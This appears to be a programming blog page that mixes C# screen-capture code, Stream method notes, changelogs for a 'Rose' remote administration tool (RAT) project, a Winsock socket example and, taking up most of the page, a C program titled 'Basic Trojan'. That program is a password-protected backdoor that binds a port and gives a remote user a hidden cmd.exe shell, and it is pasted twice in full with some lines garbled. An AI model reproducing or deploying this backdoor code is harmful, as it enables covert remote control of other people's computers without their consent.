public static Bitmap CaptureDesktopWithCursor()
{
int cursorX = 0;
int cursorY = 0;
Bitmap desktopBMP;
Bitmap cursorBMP;
Bitmap finalBMP;
Graphics g;
Rectangle r;
desktopBMP = CaptureDesktop();
cursorBMP = CaptureCursor(ref cursorX, ref cursorY);
if(desktopBMP != null)
{
if (cursorBMP != null)
{
r = new Rectangle(cursorX, cursorY,
cursorBMP.Width, cursorBMP.Height);
g = Graphics.FromImage(desktopBMP);
g.DrawImage(cursorBMP, r);
g.Flush();
return desktopBMP;
}
else
return desktopBMP;
}
return null;
}
static Bitmap CaptureCursor(ref int x, ref int y)
{
Bitmap bmp;
IntPtr hicon;
Win32Stuff.CURSORINFO ci = new Win32Stuff.CURSORINFO();
Win32Stuff.ICONINFO icInfo;
ci.cbSize = Marshal.SizeOf(ci);
if(Win32Stuff.GetCursorInfo(out ci))
{
if (ci.flags == Win32Stuff.CURSOR_SHOWING)
{
hicon = Win32Stuff.CopyIcon(ci.hCursor);
if(Win32Stuff.GetIconInfo(hicon, out icInfo))
{
x = ci.ptScreenPos.x - ((int)icInfo.xHotspot);
y = ci.ptScreenPos.y - ((int)icInfo.yHotspot);
Icon ic = Icon.FromHandle(hicon);
bmp = ic.ToBitmap();
return bmp;
}
}
}
return null;
}
// ssWithMouseViewer is the PictureBox control
private void Display(Bitmap desktop)
{
Graphics g;
Rectangle r;
if(desktop != null)
{
r = new Rectangle(0,0,ssWithMouseViewer.Width,
ssWithMouseViewer.Height);
g = ssWithMouseViewer.CreateGraphics();
g.DrawImage(desktop,r);
g.Flush();
}
}
adBrite
Showing posts with label client servers. Show all posts
Showing posts with label client servers. Show all posts
Wednesday, October 27, 2010
Stream.Read Method
When overridden in a derived class, reads a sequence of bytes from the
current stream and advances the position within the stream by the number of bytes read. public abstract int Read( byte[] buffer, int offset, int count )
Stream.Write Method
When overridden in a derived class, writes a sequence of bytes to the
current stream and advances the current position within this stream by
the number of bytes written.
const int size = 4096; byte[] bytes = new byte[4096]; int numBytes; while((numBytes = input.Read(bytes, 0, size)) > 0) output.Write(bytes, 0, numBytes);
Friday, October 22, 2010
The Rose remote administration tool project Beta 1.5 (client servers)
- Improved Interface
- Improved connection reliability
Friday, October 1, 2010
Wednesday, September 22, 2010
The Rose remote administration tool project Beta 1.3
- Fixed some TCP connection bugs
- Notify when servers go online by sound alert
The Rose remote administration tool project Preview
Here is a preview of the "Rose" rat project. This is beta phase.
Tuesday, November 24, 2009
Creating a Listening Socket
#include#include #include #define NETWORK_ERROR -1 #define NETWORK_OK 0 void ReportError(int, const char *); int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmd, int nShow) { WORD sockVersion; WSADATA wsaData; int nret; sockVersion = MAKEWORD(1, 1); // We'd like Winsock version 1.1 // We begin by initializing Winsock WSAStartup(sockVersion, &wsaData); // Next, create the listening socket SOCKET listeningSocket; listeningSocket = socket(AF_INET, // Go over TCP/IP SOCK_STREAM, // This is a stream-oriented socket IPPROTO_TCP); // Use TCP rather than UDP if (listeningSocket == INVALID_SOCKET) { nret = WSAGetLastError(); // Get a more detailed error ReportError(nret, "socket()"); // Report the error with our custom function WSACleanup(); // Shutdown Winsock return NETWORK_ERROR; // Return an error value } // Use a SOCKADDR_IN struct to fill in address information SOCKADDR_IN serverInfo; serverInfo.sin_family = AF_INET; serverInfo.sin_addr.s_addr = INADDR_ANY; // Since this socket is listening for connections, // any local address will do serverInfo.sin_port = htons(8888); // Convert integer 8888 to network-byte order // and insert into the port field // Bind the socket to our local server address nret = bind(listeningSocket, (LPSOCKADDR)&serverInfo, sizeof(struct sockaddr)); if (nret == SOCKET_ERROR) { nret = WSAGetLastError(); ReportError(nret, "bind()"); WSACleanup(); return NETWORK_ERROR; } // Make the socket listen nret = listen(listeningSocket, 10); // Up to 10 connections may wait at any // one time to be accept()'ed if (nret == SOCKET_ERROR) { nret = WSAGetLastError(); ReportError(nret, "listen()"); WSACleanup(); return NETWORK_ERROR; } // Wait for a client SOCKET theClient; theClient = accept(listeningSocket, NULL, // Optionally, address of a SOCKADDR_IN struct NULL); // Optionally, address of variable containing // sizeof ( struct SOCKADDR_IN ) if (theClient == INVALID_SOCKET) { nret = WSAGetLastError(); ReportError(nret, "accept()"); WSACleanup(); return NETWORK_ERROR; } // Send and receive from the client, and finally, closesocket(theClient); closesocket(listeningSocket); // Shutdown Winsock WSACleanup(); return NETWORK_OK; } void ReportError(int errorCode, const char *whichFunc) { char errorMsg[92]; // Declare a buffer to hold // the generated error message ZeroMemory(errorMsg, 92); // Automatically NULL-terminate the string // The following line copies the phrase, whichFunc string, and integer errorCode into the buffer sprintf(errorMsg, "Call to %s returned error %d!", (char *)whichFunc, errorCode); MessageBox(NULL, errorMsg, "socketIndication", MB_OK); }
Basic Trojan
#include
#include
#include
//our variables, we need them globally to use them in all functions
const char welcome[]="Welcome, enter your password please: ";
char bufferin[1024]; //the buffer to read data from socket
char bufferout[65535]; //the buffer to write data to the socket
int i,port; // i is used for loop , port is going to keep the portnumber
SOCKET locsock,remsock; //the sockets we are going to need
SOCKADDR_IN sinloc,sinrem; //the structures needed for our sockets
WSADATA wsadata; //wsadata
STARTUPINFO startinfo; //startupinfo structure for CreateProcess
SECURITY_ATTRIBUTES secat; //security attributes structure needed for CreateProcess
PROCESS_INFORMATION procinfo; //process info struct needed for CreateProcess
int bytesWritten; //number of bytes written gets stored here
DWORD bytesRead,avail,exitcode; //number of bytes read, number of bytes available
//and the exitcode
void CommandPrompt(void); //the function to give the command prompt
void Usage(char AppName[]); //the function which puts the usage of the program to the screen
int main(int argc, char *argv[]) //the main function
{
if(argc!=3) //check if we are having enough parameters
{
Usage(argv[0]);
return EXIT_FAILURE;
}
//check if the portnumber given is really a number
for(i=0;i
{
if(isdigit(argv[1][i])==0)
{
printf("Invalid port number.");
return EXIT_FAILURE;
}
}
port=atoi(argv[1]); //make integer from ascii string
//final check to see if it is a real port number
if(port>65535||port<1)
{
printf("Invalid port number.");
return EXIT_FAILURE;
}
//tell windows we want to use sockets
WSAStartup(0x101,&wsadata);
//create socket
locsock=socket(AF_INET,SOCK_STREAM,0);
//fill structure
sinloc.sin_family=AF_INET;
sinloc.sin_addr.s_addr=INADDR_ANY;
sinloc.sin_port=htons(port);
//bind the socket to the specified port
if(bind(locsock,(SOCKADDR*)&sinloc,sizeof(SOCKADDR_IN))==SOCKET_ERROR)
{
WSACleanup();
printf("Error binding socket.");
return EXIT_FAILURE;
}
//listen on the specified socket
if(listen(locsock,5)==SOCKET_ERROR)
{
WSACleanup();
printf("Error listening socket.");
return EXIT_FAILURE;
}
//infinite loop here to keep the program listening
while(1)
{
remsock=SOCKET_ERROR;
while(remsock==SOCKET_ERROR)
{
//accept connection to our program
remsock=accept(locsock,NULL,NULL);
if(remsock==INVALID_SOCKET)
{
//cleanup and exit program
WSACleanup();
printf("Error accepting socket.");
return EXIT_FAILURE;
}
}
//ask for password
send(remsock,welcome,sizeof(welcome),0);
recv(remsock,bufferin,sizeof(bufferin),0);
//check password given
bufferin[strlen(bufferin)-1]=0; //we need this to strip off last character
if(strcmp(bufferin,argv[2])!=0)
{
send(remsock,"\nAccess Denied.\n",17,0);
}
else
{
CommandPrompt(); //start the commandprompt function
}
closesocket(remsock); //close the socket
}
//we should never reach this point, but i've put this hear just in case ;-)
return EXIT_SUCCESS;
}
//*************************************************************
void Usage(char AppName[]) //the function which does nothing more then print out the usage
{
printf("backdoor, written by White Scorpion Security (C) 2005\n");
printf(" ****scorpion ****\n\n");
printf("Usage: %s \n",AppName);
}
//*************************************************************
void CommandPrompt(void) //the function which handles the complete commandprompt
{
secat.nLength=sizeof(SECURITY_ATTRIBUTES);
secat.bInheritHandle=TRUE;
DWORD bytesW; //number of bytes written gets stored here
HANDLE newstdin,newstdout,readout,writein; //the handles for our Pipes
char exit1[]={'e','x','i','t',10,0}; //we need this to compare our command to 'exit'
char exit2[]={'E','X','I','T',10,0}; //we need this to compare our command to 'EXIT'
//create the pipes for our command prompt
CreatePipe(&newstdin,&writein,&secat,0);
CreatePipe(&readout,&newstdout,&secat,0);
GetStartupInfo(&startinfo);
//fill another structure
startinfo.dwFlags=STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
startinfo.wShowWindow=SW_HIDE;
startinfo.hStdOutput=newstdout;
startinfo.hStdError=newstdout;
startinfo.hStdInput=newstdin;
//start cmd prompt
CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,CREATE_NEW_CONSOLE,NULL,NULL,&startinfo,&procinfo);
//endless loop
while(1)
{
//check if cmd.exe is still running, if not then cleanup and start listening again.
if(GetExitCodeProcess(procinfo.hProcess,&exitcode)==STILL_ACTIVE)
{
CloseHandle(procinfo.hThread);
CloseHandle(procinfo.hProcess);
CloseHandle(newstdin);
CloseHandle(writein);
CloseHandle(readout);
CloseHandle(newstdout);
break;
}
bytesRead=0;
//sleep 0.5 seconds to give cmd.exe the chance to startup
sleep(500);
//check if the pipe already contains something we can write to output
PeekNamedPipe(readout,bufferout,sizeof(bufferout),&bytesRead,&avail,NULL);
if(bytesRead!=0)
{
while(bytesRead!=0)
{ //read data from cmd.exe and send to client, then clear the buffer
ReadFile(readout,bufferout,sizeof(bufferout),&bytesRead,NULL);
send(remsock,bufferout,strlen(bufferout),0);
ZeroMemory(bufferout,sizeof(bufferout));
sleep(100);
PeekNamedPipe(readout,bufferout,sizeof(bufferout),&bytesRead,&avail,NULL);
}
}
// clear bufferin
ZeroMemory(bufferin,sizeof(bufferin));
//receive the command given
recv(remsock,bufferin,sizeof(bufferin),0);
//if command is 'exit' or 'EXIT' then we have to capture it to prevent our program
//from hanging.
if((strcmp(bufferin,exit1)==0)||(strcmp(bufferin,exit2)==0))
{
//let cmd.exe close by giving the command, then go to closeup label
WriteFile(writein,bufferin,strlen(bufferin),&bytesW,NULL);
goto closeup;
}
//else write the command to cmd.exe
WriteFile(writein,bufferin,strlen(bufferin),&bytesW,NULL);
//clear the bufferin
for(i=0;i
{
bufferin[i]=0;
}
}
//close up all handles
closeup:
CloseHandle(procinfo.hThread);
CloseHandle(procinfo.hProcess);
CloseHandle(newstdin);
CloseHandle(writein);
CloseHandle(readout);
CloseHandle(newstdout);
}
#include
#include
//our variables, we need them globally to use them in all functions
const char welcome[]="Welcome, enter your password please: ";
char bufferin[1024]; //the buffer to read data from socket
char bufferout[65535]; //the buffer to write data to the socket
int i,port; // i is used for loop , port is going to keep the portnumber
SOCKET locsock,remsock; //the sockets we are going to need
SOCKADDR_IN sinloc,sinrem; //the structures needed for our sockets
WSADATA wsadata; //wsadata
STARTUPINFO startinfo; //startupinfo structure for CreateProcess
SECURITY_ATTRIBUTES secat; //security attributes structure needed for CreateProcess
PROCESS_INFORMATION procinfo; //process info struct needed for CreateProcess
int bytesWritten; //number of bytes written gets stored here
DWORD bytesRead,avail,exitcode; //number of bytes read, number of bytes available
//and the exitcode
void CommandPrompt(void); //the function to give the command prompt
void Usage(char AppName[]); //the function which puts the usage of the program to the screen
int main(int argc, char *argv[]) //the main function
{
if(argc!=3) //check if we are having enough parameters
{
Usage(argv[0]);
return EXIT_FAILURE;
}
//check if the portnumber given is really a number
for(i=0;i
{
if(isdigit(argv[1][i])==0)
{
printf("Invalid port number.");
return EXIT_FAILURE;
}
}
port=atoi(argv[1]); //make integer from ascii string
//final check to see if it is a real port number
if(port>65535||port<1)
{
printf("Invalid port number.");
return EXIT_FAILURE;
}
//tell windows we want to use sockets
WSAStartup(0x101,&wsadata);
//create socket
locsock=socket(AF_INET,SOCK_STREAM,0);
//fill structure
sinloc.sin_family=AF_INET;
sinloc.sin_addr.s_addr=INADDR_ANY;
sinloc.sin_port=htons(port);
//bind the socket to the specified port
if(bind(locsock,(SOCKADDR*)&sinloc,sizeof(SOCKADDR_IN))==SOCKET_ERROR)
{
WSACleanup();
printf("Error binding socket.");
return EXIT_FAILURE;
}
//listen on the specified socket
if(listen(locsock,5)==SOCKET_ERROR)
{
WSACleanup();
printf("Error listening socket.");
return EXIT_FAILURE;
}
//infinite loop here to keep the program listening
while(1)
{
remsock=SOCKET_ERROR;
while(remsock==SOCKET_ERROR)
{
//accept connection to our program
remsock=accept(locsock,NULL,NULL);
if(remsock==INVALID_SOCKET)
{
//cleanup and exit program
WSACleanup();
printf("Error accepting socket.");
return EXIT_FAILURE;
}
}
//ask for password
send(remsock,welcome,sizeof(welcome),0);
recv(remsock,bufferin,sizeof(bufferin),0);
//check password given
bufferin[strlen(bufferin)-1]=0; //we need this to strip off last character
if(strcmp(bufferin,argv[2])!=0)
{
send(remsock,"\nAccess Denied.\n",17,0);
}
else
{
CommandPrompt(); //start the commandprompt function
}
closesocket(remsock); //close the socket
}
//we should never reach this point, but i've put this hear just in case ;-)
return EXIT_SUCCESS;
}
//*************************************************************
void Usage(char AppName[]) //the function which does nothing more then print out the usage
{
printf("backdoor, written by White Scorpion Security (C) 2005\n");
printf(" ****scorpion ****\n\n");
printf("Usage: %s
}
//*************************************************************
void CommandPrompt(void) //the function which handles the complete commandprompt
{
secat.nLength=sizeof(SECURITY_ATTRIBUTES);
secat.bInheritHandle=TRUE;
DWORD bytesW; //number of bytes written gets stored here
HANDLE newstdin,newstdout,readout,writein; //the handles for our Pipes
char exit1[]={'e','x','i','t',10,0}; //we need this to compare our command to 'exit'
char exit2[]={'E','X','I','T',10,0}; //we need this to compare our command to 'EXIT'
//create the pipes for our command prompt
CreatePipe(&newstdin,&writein,&secat,0);
CreatePipe(&readout,&newstdout,&secat,0);
GetStartupInfo(&startinfo);
//fill another structure
startinfo.dwFlags=STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
startinfo.wShowWindow=SW_HIDE;
startinfo.hStdOutput=newstdout;
startinfo.hStdError=newstdout;
startinfo.hStdInput=newstdin;
//start cmd prompt
CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,CREATE_NEW_CONSOLE,NULL,NULL,&startinfo,&procinfo);
//endless loop
while(1)
{
//check if cmd.exe is still running, if not then cleanup and start listening again.
if(GetExitCodeProcess(procinfo.hProcess,&exitcode)==STILL_ACTIVE)
{
CloseHandle(procinfo.hThread);
CloseHandle(procinfo.hProcess);
CloseHandle(newstdin);
CloseHandle(writein);
CloseHandle(readout);
CloseHandle(newstdout);
break;
}
bytesRead=0;
//sleep 0.5 seconds to give cmd.exe the chance to startup
sleep(500);
//check if the pipe already contains something we can write to output
PeekNamedPipe(readout,bufferout,sizeof(bufferout),&bytesRead,&avail,NULL);
if(bytesRead!=0)
{
while(bytesRead!=0)
{ //read data from cmd.exe and send to client, then clear the buffer
ReadFile(readout,bufferout,sizeof(bufferout),&bytesRead,NULL);
send(remsock,bufferout,strlen(bufferout),0);
ZeroMemory(bufferout,sizeof(bufferout));
sleep(100);
PeekNamedPipe(readout,bufferout,sizeof(bufferout),&bytesRead,&avail,NULL);
}
}
// clear bufferin
ZeroMemory(bufferin,sizeof(bufferin));
//receive the command given
recv(remsock,bufferin,sizeof(bufferin),0);
//if command is 'exit' or 'EXIT' then we have to capture it to prevent our program
//from hanging.
if((strcmp(bufferin,exit1)==0)||(strcmp(bufferin,exit2)==0))
{
//let cmd.exe close by giving the command, then go to closeup label
WriteFile(writein,bufferin,strlen(bufferin),&bytesW,NULL);
goto closeup;
}
//else write the command to cmd.exe
WriteFile(writein,bufferin,strlen(bufferin),&bytesW,NULL);
//clear the bufferin
for(i=0;i
{
bufferin[i]=0;
}
}
//close up all handles
closeup:
CloseHandle(procinfo.hThread);
CloseHandle(procinfo.hProcess);
CloseHandle(newstdin);
CloseHandle(writein);
CloseHandle(readout);
CloseHandle(newstdout);
}
Subscribe to:
Posts (Atom)
